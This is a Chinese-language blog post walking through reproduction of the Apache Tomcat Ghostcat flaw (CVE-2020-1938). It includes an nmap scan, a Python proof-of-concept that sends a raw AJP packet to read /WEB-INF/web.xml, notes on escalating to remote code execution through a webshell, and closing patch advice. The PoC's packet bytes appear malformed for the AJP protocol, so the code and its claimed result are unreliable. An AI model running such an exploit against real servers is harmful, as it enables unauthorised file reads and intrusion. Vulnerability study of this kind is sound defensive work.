Tomcat CVE-2020-1938 漏洞复现和利用过程

Shaw0xyz

1. 简介

CVE-2020-1938漏洞，也被称为Ghostcat，是Apache Tomcat中的一个严重漏洞。该漏洞允许攻击者通过AJP协议未经身份验证地读取和包含Tomcat服务器上的任意文件，从而导致信息泄露甚至远程代码执行。本文将详细介绍该漏洞的复现和利用过程。

1.1 环境准备

为了复现CVE-2020-1938漏洞，我们需要以下环境：

(1) 一台安装了Tomcat的服务器，版本为Tomcat 6.x, 7.x, 8.x或9.x
(2) 配置AJP协议（默认情况下，Tomcat的AJP端口为8009）
(3) 攻击者主机，可以运行常用的渗透测试工具，如nmap和Metasploit

1.1.1 Tomcat安装与配置

首先，下载并安装合适版本的Tomcat。

下载地址：https://tomcat.apache.org/download-90.cgi

下载后，解压并配置Tomcat。确保AJP连接器在conf/server.xml文件中启用：

1. <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />

复制代码

1.2 漏洞原理

CVE-2020-1938漏洞存在于Tomcat的AJP协议中。AJP协议是一种二进制协议，通常用于在Apache HTTP服务器和Tomcat之间传输数据。由于AJP连接器在默认配置下没有进行严格的访问控制，攻击者可以利用该协议访问服务器上的任意文件。

2. 漏洞复现

2.1 确认AJP端口开启

使用nmap扫描目标服务器，确认AJP端口8009是否开启：

1. nmap -p 8009 <target-ip>

复制代码

2.2 使用PoC代码测试漏洞

下面是一个简单的Python PoC代码，用于读取Tomcat服务器上的文件：

1. import socket
   
2. 
   
3. def create_ajp_forward_request(file_path):
   
4.     return b"\x12\x34\x00\x0B\x00\x02\x00\x06\x47\x45\x54\x00" + \
   
5.            b"\x08\x2F" + file_path.encode() + b"\x00\x00\xFF\xFF"
   
6. 
   
7. def send_ajp_request(host, port, file_path):
   
8.     request = create_ajp_forward_request(file_path)
   
9.     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   
10.     sock.connect((host, port))
    
11.     sock.sendall(request)
    
12.     response = sock.recv(1024)
    
13.     sock.close()
    
14.     return response
    
15. 
    
16. if __name__ == "__main__":
    
17.     host = "target-ip"
    
18.     port = 8009
    
19.     file_path = "/WEB-INF/web.xml"
    
20.     response = send_ajp_request(host, port, file_path)
    
21.     print(response.decode(errors="ignore"))

复制代码

2.3 分析PoC结果

运行上述PoC代码后，如果成功，应该会看到Tomcat服务器上/WEB-INF/web.xml文件的内容。这表明服务器存在CVE-2020-1938漏洞。

3. 漏洞利用

利用CVE-2020-1938漏洞可以进一步实现信息泄露和远程代码执行。

3.1 信息泄露

通过读取服务器上的敏感文件，如配置文件和日志文件，可以获取大量有价值的信息。这些信息可能包括数据库连接字符串、应用程序配置等。

3.2 远程代码执行

在某些情况下，可以利用文件包含功能执行任意代码。例如，如果能够包含服务器上的webshell文件，就可以通过访问该webshell执行任意命令。

4. 修复建议

为了解决CVE-2020-1938漏洞，建议采取以下措施：

(1) 升级Tomcat至最新版本，已修复该漏洞。
(2) 禁用AJP连接器或限制其访问权限，仅允许可信任的主机访问。
(3) 配置防火墙规则，禁止未授权的外部访问AJP端口。

5. 总结

CVE-2020-1938漏洞是一个严重的安全问题，可能导致敏感信息泄露和远程代码执行。通过了解漏洞原理、复现过程和利用方法，可以更好地防范此类安全风险。同时，及时更新和配置服务器也是确保安全的关键步骤。



/ 荔枝学姐de课后专栏 /

Hi！这里是荔枝学姐~

欢迎来到我的课后专栏

自然语言学渣 NLP摆烂姐

热衷于技术写作 IT边角料

AIGC & Coding & linux ...

~互撩~ TG: @Shaw_0xyz